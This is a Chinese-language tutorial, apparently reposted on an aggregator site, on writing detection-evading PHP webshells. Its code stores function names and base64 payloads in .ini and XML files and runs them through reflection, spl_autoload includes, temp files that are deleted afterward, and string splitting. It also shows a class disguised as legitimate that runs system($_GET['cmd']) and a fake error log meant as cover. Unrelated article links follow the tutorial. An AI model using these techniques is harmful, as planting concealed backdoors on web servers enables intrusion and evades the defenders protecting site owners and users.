基于 PHP 內置類及函數的免殺 WebShell

前言

PHP 作為廣泛使用的服務端語言,其靈活的內置類(如 DOMDocument)和文件操作機制(.ini.inc 的自動加載),為攻擊者提供了天然的隱蔽通道。通過 動態函數拼接反射調用加密混淆偽命名空間 等手法,惡意代碼得以“寄生”于正常的業務邏輯中,甚至借助析構函數、自動加載等機制實現 無文件化觸發。這種“隱寫術”般的攻擊方式,不僅挑戰了傳統檢測技術的邊界,也對開發者和安全團隊提出了更高維度的防御要求。

本文將以 PHP 內置類與文件操作 為核心,深度剖析攻擊者如何將 XML 解析、配置加載、自動包含等“合法”功能武器化,構建出零特征、高動態的免殺 WebShell。

利用parse_ini_file函數

PHP中有一個名為parse_ini_file的函數,用于解析.ini文件 , 如果Webshell的代碼隱藏在.ini文件的某些配置項中,然后通過解析這些配置項來動態執行代碼。

動態函數調用 + 反射執行

創建一個.ini文件,其中包含惡意代碼的字符串

// [payload]
// func_name = "system"
// encoded_cmd = "d2hvYW1p"  // base64("whoami")

代碼:

class ConfigLoader {private $config;public function __construct($file) {$this->config = parse_ini_file($file, true); // 解析 .ini 文件$this->execute();}private function execute() {$func = $this->config['payload']['func_name'];$cmd = base64_decode($this->config['payload']['encoded_cmd']);// 使用反射動態調用函數$reflection = new ReflectionFunction($func);$reflection->invoke($cmd);}
}new ConfigLoader('config.ini'); // 觸發執行
  • 敏感函數名(system)和指令(whoami)均存儲在 .ini 文件中,避免代碼硬編碼。
  • 使用 反射(ReflectionFunction) 間接調用函數,繞過靜態檢測。
臨時文件寫入 + 包含執行

.ini文件

[payload]
encoded_code = "PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4="
<?
class TempFileExecutor {private $code;public function __construct($iniFile) {$config = parse_ini_file($iniFile);$this->code = base64_decode($config['encoded_code']);$this->run();}private function run() {$tempFile = tempnam(sys_get_temp_dir(), 'tmp_');file_put_contents($tempFile, $this->code);include $tempFile;    // 包含臨時文件執行代碼unlink($tempFile);    // 清理痕跡}
}new TempFileExecutor('evil.ini');

利用spl_autoload 函數

函數定義
spl_autoload(string $class_name, string $file_extensions = null): void
  • 參數

  • $class_name:需要加載的類名。

  • $file_extensions(可選):指定文件擴展名(如 .php,.inc),默認使用 include_path 中的配置。

行為邏輯
  1. 將類名 $class_name 轉換為小寫(若系統區分大小寫則保留原大小寫)。
  2. $file_extensions 指定的擴展名,在 include_path 目錄下查找文件。
  3. 找到文件后自動包含(include_once)該文件。

1.inc文件

<?php system("whoami"); ?>

1.php

<?php spl_autoload("1"); ?>
  1. spl_autoload("1") 嘗試加載類名為 nb 的文件。
  2. 按默認規則查找 nb.php1.inc,發現 1.inc 存在。
  3. 包含 1.inc 并執行 webshell,輸出服務器配置信息。

關鍵點

  • spl_autoload 不僅用于加載類,直接調用時也可觸發文件包含
  • 文件擴展名(.inc)和類名(1)需匹配,但文件內容無需嚴格包含類定義。
偽裝類文件 + 動態執行

payload.inc

<?php
class Payload { // 偽裝成合法類public static function run() {system($_GET['cmd']); // 惡意代碼}
}

1.php

<?php
spl_autoload("payload"); // 加載 Payload 類
if (class_exists('Payload')) {Payload::run(); // 觸發惡意代碼
}

利用DOMDocument類

DOMDocument 是 PHP 中用于處理 XMLHTML 文檔的核心類。它基于 W3C 的 DOM(Document Object Model)標準,提供了一套完整的 API,允許開發者以樹形結構操作文檔節點(如元素、屬性、文本等)。,支持XPath查詢和動態節點解析 (php版本>8.0)

常用方法

方法名功能說明示例
createElement($name, $value)創建元素節點$element = $dom->createElement('tag', 'content')
createAttribute($name)創建屬性節點$attr = $dom->createAttribute('id')
getElementsByTagName($name)通過標簽名獲取節點列表$items = $dom->getElementsByTagName('item')
getElementById($id)通過 ID 獲取單個元素(需 DTD 驗證)$node = $dom->getElementById('main')
saveHTML()輸出 HTML 格式字符串(處理 HTML 文檔時)$html = $dom->saveHTML()
validate()驗證文檔是否符合 DTD/XSDif ($dom->validate()) { ... }

解析 XML 數據

<?php
$xml = <<<XML
<?xml version="1.0"?>
<books><book id="1"><title>PHP Basics</title><author>John Doe</author></book>
</books>
XML;$dom = new DOMDocument();
$dom->loadXML($xml);// 遍歷所有 <book> 節點
foreach ($dom->getElementsByTagName('book') as $book) {$title = $book->getElementsByTagName('title')->item(0)->nodeValue;$author = $book->getElementsByTagName('author')->item(0)->nodeValue;echo "Title: $title, Author: $author\n";
}

輸出:

這里我們可以提取xml里面各節點的內容,這樣的話,我們就可以把惡意字符串隱藏在xml文件里面

<?php
// 惡意 XML 數據(可遠程加載或硬編碼)
$xml = <<<XML
<root><data>whoami</data>
</root>
XML;$doc = new DOMDocument();
$doc->loadXML($xml);  // 解析 XML
$xpath = new DOMXPath($doc);
$node = $xpath->query('//data')->item(0); // 提取節點值// 動態調用高危函數(避免直接寫 system)
$func = 'sys' . 'tem';
$func($node->nodeValue);  // 執行系統命令
?>

將惡意字符串完全隱藏在 XML 文件中

1.xml

<?xml version="1.0" encoding="UTF-8"?>
<config><!-- 函數名分塊存儲 --><function><part>sys</part><part>tem</part></function><!-- 參數使用 Base64 編碼 --><data>d2hvYW1p</data> <!-- Base64("whoami") -->
</config>

1.php

<?php
// 加載外部 XML 文件(可替換為遠程 URL)
$xml = file_get_contents('malicious.xml');// 解析 XML
$doc = new DOMDocument();
$doc->loadXML($xml);
$xpath = new DOMXPath($doc);// 提取分塊函數名并拼接
$funcParts = $xpath->query('//function/part');
$func = '';
foreach ($funcParts as $part) {$func .= $part->nodeValue; // 拼接為 "system"
}// 提取并解碼參數
$dataNode = $xpath->query('//data')->item(0);
$arg = base64_decode($dataNode->nodeValue); // 解碼為 "whoami"// 動態調用(增加安全驗證)
if ($func && $arg && function_exists($func)) {($func)($arg); // 執行 system("whoami")
} else {error_log("配置錯誤或函數不可用"); // 偽裝成普通錯誤日志
}
?>

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/75636.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/75636.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/75636.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Arduino、ESP32驅動BME688環境傳感器(環境傳感器篇)

目錄 1、傳感器特性 2、硬件原理圖 3、控制器和傳感器連線圖 4、驅動程序 4.1、讀取數據(無IAQ指數) 4.2、讀取數據(帶IAQ數值) BME688環境傳感器是一款四合一MEMS環境傳感器,可測量VOC(揮發性有機物)、溫度、濕度、氣壓這四個參數,非常適用于監測空氣質量。由于…

數據結構——順序棧seq_stack

前言&#xff1a;大家好&#x1f60d;&#xff0c;本文主要介紹了數據結構——順序棧 目錄 一、概念 1.1 順序棧的基本概念 1.2 順序棧的存儲結構 二、基本操作 2.1 結構體定義 2.2 初始化 2.3 判空 2.4 判滿 2.5 擴容 2.6 插入 入棧 2.7 刪除 出棧 2.8 獲取棧頂元…

C++20 中的std::c8rtomb和 std::mbrtoc8

文章目錄 1. 引言2. std::c8rtomb 函數詳解3. std::mbrtoc8 函數詳解4. 使用示例5. 注意事項6. 總結 1. 引言 C20 標準引入了對 UTF-8 編碼的更好支持&#xff0c;其中包括兩個重要的函數&#xff1a;std::c8rtomb 和 std::mbrtoc8。這兩個函數分別用于將 UTF-8 編碼的字符轉換…

AI音樂生成革命:解讀昆侖萬維Mureka O1的技術突破與應用實踐

AI音樂生成革命&#xff1a;解讀昆侖萬維Mureka O1的技術突破與應用實踐 全球音樂產業正經歷AI技術重塑&#xff0c;昆侖萬維最新發布的音樂推理大模型Mureka O1引發行業震動。本文深度解析其技術原理與實測表現&#xff0c;揭開AI音樂創作新紀元的技術密碼 一、技術演進&…

《Operating System Concepts》閱讀筆記:p483-p488

《Operating System Concepts》學習第 40 天&#xff0c;p483-p488 總結&#xff0c;總計 6 頁。 一、技術總結 1.object storage (1)object storage 管理軟件 Hadoop file system(HDFS)、Ceph。 二、英語總結(生詞&#xff1a;1) 1.commodity (1)commodity: com-(“tog…

強化學習與神經網絡結合(以 DQN 展開)

目錄 基于 PyTorch 實現簡單 DQN double DQN dueling DQN Noisy DQN&#xff1a;通過噪聲層實現探索&#xff0c;替代 ε- 貪心策略 Rainbow_DQN如何計算連續型的Actions 強化學習中&#xff0c;智能體&#xff08;Agent&#xff09;通過與環境交互學習最優策略。當狀態空間或動…

“11.9元“引發的系統雪崩:Spring Boot中BigDecimal反序列化異常全鏈路狙擊戰 ?

&#x1f4a5; "11.9元"引發的系統雪崩&#xff1a;Spring Boot中BigDecimal反序列化異常全鏈路狙擊戰 &#x1f3af; &#x1f50d; 用 Mermaid原生防御體系圖 #mermaid-svg-XZtcYBnmHrF9bFjc {font-family:"trebuchet ms",verdana,arial,sans-serif;fon…

Cortex-M7進入異常中斷分析

使用cmbacktrace庫&#xff0c;其支持M3,4,7。 1、串口輸出異常信息 #define cmb_println(...) Debug_Printf(__VA_ARGS__)//cmb_println處理可變參數和格式化字符串 int Debug_Printf(const char *fmt, ...) {char buffer[DEBUG_TxBUFLEN];INT16U n;va_list args;va_star…

如何管理間接需求?團隊實踐分享

管理間接需求的核心方法包括明確需求識別流程、建立規范的需求管理體系、實施有效的需求溝通機制。 其中&#xff0c;明確需求識別流程最為關鍵。企業在實際業務中&#xff0c;往往會遇到大量的間接需求&#xff0c;如非直接生產性的采購需求、服務類需求等。這些需求往往隱蔽性…

與Aspose.pdf類似的jar庫分享

如果你在尋找類似于 Aspose.PDF 的 JAR 庫&#xff0c;這些庫通常用于處理 PDF 文檔的創建、編輯、轉換、合并等功能。以下是一些類似的 Java 庫&#xff0c;它們提供 PDF 處理的功能&#xff0c;其中一些是收費的&#xff0c;但也有開源選項&#xff1a; 1. iText (iText PDF…

2-2 MATLAB鮣魚優化算法ROA優化CNN超參數回歸預測

本博客來源于CSDN機器魚&#xff0c;未同意任何人轉載。 更多內容&#xff0c;歡迎點擊本專欄目錄&#xff0c;查看更多內容。 目錄 0.引言 1.ROA優化CNN 2.主程序調用 3.結語 0.引言 在博客【ROA優化LSTM超參數回歸】中&#xff0c;我們采用ROA對LSTM的學習率、迭代次數…

企業入駐成都國際數字影像產業園,可享150多項專業服務

企業入駐成都國際數字影像產業園&#xff0c;可享150多項專業服務 全方位賦能&#xff0c;助力影像企業騰飛 入駐成都國際數字影像產業園&#xff0c;企業將獲得一個涵蓋超過150項專業服務的全周期、一站式支持體系&#xff0c;旨在精準解決企業發展各階段的核心需求&#xf…

線路板元器件介紹及選型指南:提高電路設計效率

電路板&#xff08;PCB&#xff09;是現代電子設備的核心&#xff0c;其上安裝了各類電子元器件&#xff0c;這些元器件通過PCB的導電線路彼此連接&#xff0c;實現信號傳輸與功能執行。 元器件的選擇與安裝直接決定了電子產品的性能與穩定性。本文將為大家詳細介紹電路板上的…

探究 Arm Compiler for Embedded 6 的 Clang 版本

原創標題&#xff1a;Arm Compiler for Embedded 6 的 Clang 版本 原創作者&#xff1a;莊曉立&#xff08;LIIGO&#xff09; 原創日期&#xff1a;20250218&#xff08;首發日期20250326&#xff09; 原創連接&#xff1a;https://blog.csdn.net/liigo/article/details/14653…

RedHat7.6_x86_x64服務器(最小化安裝)搭建使用記錄(二)

PostgreSQL數據庫部署管理 1.rpm方式安裝 掛載系統安裝鏡像&#xff1a; [rootlocalhost ~]# mount /dev/cdrom /mnt 進入安裝包路徑&#xff1a; [rootlocalhost ~]# cd /mnt/Packages 依次安裝如下程序包&#xff1a; [rootlocalhost Packages]# rpm -ihv postgresql-libs-9…

瀏覽器存儲 IndexedDB

IndexedDB 1. 什么是 IndexedDB&#xff1f; IndexedDB 是一種 基于瀏覽器的 NoSQL 數據庫&#xff0c;用于存儲大量的結構化數據&#xff0c;包括文件和二進制數據。它比 localStorage 和 sessionStorage 更強大&#xff0c;支持索引查詢、事務等特性。 IndexedDB 主要特點…

panda3d 渲染

目錄 安裝 設置渲染寬高&#xff1a; 渲染3d 安裝 pip install Panda3D 設置渲染寬高&#xff1a; import panda3d.core as pdmargin 100 screen Tk().winfo_screenwidth() - margin, Tk().winfo_screenheight() - margin width, height (screen[0], int(screen[0] / 1…

Node.js 包管理工具 - NPM 與 PNPM 清理緩存

NPM 清理緩存 1、基本介紹 npm 緩存是 npm 用來存儲已下載包的地方&#xff0c;以加快后續安裝速度 但是&#xff0c;有時緩存可能會損壞或占用過多磁盤空間&#xff0c;這時可以清理 npm 緩存 2、清理操作 執行如下指令&#xff0c;清理 npm 緩存 npm cache clean --for…

STM32F103_LL庫+寄存器學習筆記05 - GPIO輸入模式,捕獲上升沿進入中斷回調

導言 GPIO設置輸入模式后&#xff0c;一般會用輪詢的方式去查看GPIO的電平狀態。比如&#xff0c;最常用的案例是用于檢測按鈕的當前狀態&#xff08;是按下還是沒按下&#xff09;。中斷的使用一般用于計算脈沖的頻率與計算脈沖的數量。 項目地址&#xff1a;https://github.…

【C++進階二】string的模擬實現

【C進階二】string的模擬實現 1.構造函數和C_strC_str: 2.operator[]3.拷貝構造3.1淺拷貝3.2深拷貝 4.賦值5.迭代器6.比較ascll碼值的大小7.reverse擴容8.push_back尾插和append尾插9.10.insert10.1在pos位置前插入字符ch10.2在pos位置前插入字符串str 11.resize12.erase12.1從…